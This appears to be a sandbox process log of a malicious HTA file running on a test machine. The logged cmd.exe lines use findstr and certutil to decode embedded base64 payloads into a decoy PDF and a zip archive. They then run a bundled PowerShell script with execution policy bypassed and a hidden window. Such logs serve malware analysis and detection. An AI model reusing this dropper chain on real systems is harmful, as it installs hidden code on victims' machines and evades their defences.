iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\sfmw.hta.html
2144cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local\Temp && findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">1.log && certutil -decode -f 1.log sexoffender.pdf && del 1.log && sexoffender.pdf
1728findstr.exe findstr /b "JVBERi0xLj" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html"
2688cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\test22\AppData\Local && findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html">2.log && certutil -decode -f 2.log pipe.zip && del 2.log && powershell Expand-Archive -Path pipe.zip && del pipe.zip && cd pipe && powershell -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -File 1.ps1 -FileName 1.log
2552findstr.exe findstr /b "UEsDBBQAA" "/C:/Users/test22/AppData/Local/Temp/sfmw.hta.html"
2468